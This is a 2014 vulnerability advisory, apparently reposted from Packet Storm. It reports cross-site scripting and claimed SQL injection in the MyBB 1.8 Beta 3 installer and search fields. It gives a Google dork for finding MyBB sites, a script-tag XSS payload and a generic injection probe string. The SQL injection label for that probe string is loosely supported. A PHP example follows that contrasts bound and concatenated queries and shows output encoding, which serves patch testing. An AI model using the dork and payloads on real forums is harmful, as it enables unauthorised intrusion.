MyBB 1.8 Beta 3 Cross Site Scripting / SQL Injection

21 Aug 2014 | Reported by DemoLisH | Type: packetstorm | Source: packetstormsecurity.com

MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection in Installation Wizard, Private Messages, Showthread, Search, Help Documents, and Forum Displa

Code
`# Title: MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection  
# Google Dork: intext:"Powered By MyBB"  
# Date: 15.08.2014  
# Author: DemoLisH  
# Vendor Homepage: http://www.mybb.com/  
# Software Link: http://www.mybb.com/downloads  
# Version: 1.8 - Beta 3  
# Contact: [email protected]  
***************************************************  
a) Cross Site Scripting in Installation Wizard ( Board Configuration )  
Fill the Forum Name, Website Name and Website URL fields with your code, for example: "><script>alert('DemoLisH')</script> (localhost/install/index.php)  
Now let's finish setup and go to the homepage.  
  
  
b) SQL Injection in Private Messages ( User CP )  
Go to -> Inbox, for example: localhost/private.php  
Enter the following string in the Keywords search field: <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload  
  
  
c) SQL Injection in Showthread  
Go to -> Show Thread, for example: localhost/showthread.php?tid=1  
Enter the following string in the Keywords search field: <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload  
  
  
d) SQL Injection in Search  
Go to -> Search, for example: localhost/search.php  
Enter the following string in the Keywords search field: <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload  
  
  
e) SQL Injection in Help Documents  
Go to -> Help Documents, for example: localhost/misc.php?action=help  
Enter the following string in the Keywords search field: <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload  
  
  
f) SQL Injection in Forum Display  
Go to -> Forum Display, for example: localhost/forumdisplay.php?fid=2  
Enter the following string in the "Search this Forum" field: <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload  
  
***************************************************  
[~#~] Thanks To: Mugair, X-X-X, PoseidonKairos, DexmoD, Micky and all TurkeySecurity Members.  
  
`
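For anyone checking a fix for the issues reported above, the following added example (not MyBB source and not part of the advisory) runs the advisory's two input strings through a bound, wildcard-escaped LIKE search and through HTML output encoding, next to a concatenated query for contrast. The `posts` table and all function names are hypothetical, and it assumes PHP 8 with the `pdo_sqlite` extension.

```php
<?php
// Added illustration; not MyBB code. Table, column and function names are hypothetical.

// Input strings quoted in the advisory: search probe (b-f) and installer field value (a).
const PROBE = "<foo> <h1> <script> alert (bar) () ; // ' \" > < prompt \\x41 %42 constructor onload";
const BOARD_NAME = "\"><script>alert('DemoLisH')</script>";

// Hardened search: escape LIKE wildcards so input matches literally, then bind it.
function search_posts(PDO $db, string $keywords): array
{
    $literal = strtr($keywords, ['\\' => '\\\\', '%' => '\\%', '_' => '\\_']);
    $stmt = $db->prepare("SELECT subject FROM posts WHERE message LIKE :kw ESCAPE '\\'");
    $stmt->execute([':kw' => '%' . $literal . '%']);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Vulnerable counterpart, for contrast only: input concatenated into the SQL text.
function search_posts_unsafe(PDO $db, string $keywords): array
{
    return $db->query("SELECT subject FROM posts WHERE message LIKE '%$keywords%'")
              ->fetchAll(PDO::FETCH_COLUMN);
}

// Stored settings (forum name, website name, URL) are encoded when written into HTML.
function render_title(string $boardName): string
{
    return '<title>' . htmlspecialchars($boardName, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</title>';
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE posts (subject TEXT, message TEXT)');
$db->exec("INSERT INTO posts VALUES ('Welcome', 'first post'), ('Rates', '100% done')");

var_dump(search_posts($db, PROBE));   // probe is treated as data by the bound query
var_dump(search_posts($db, '0% d'));  // '%' is matched as a literal character
try {
    search_posts_unsafe($db, PROBE);  // the quote characters in the probe reach the SQL parser
} catch (PDOException $e) {
    echo 'concatenated query failed: ', $e->getMessage(), "\n";
}
echo render_title(BOARD_NAME), "\n";  // markup characters come out as HTML entities
```

A database error from the concatenated variant on this probe string is the signal to look for in application and database logs when testing the affected search fields.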
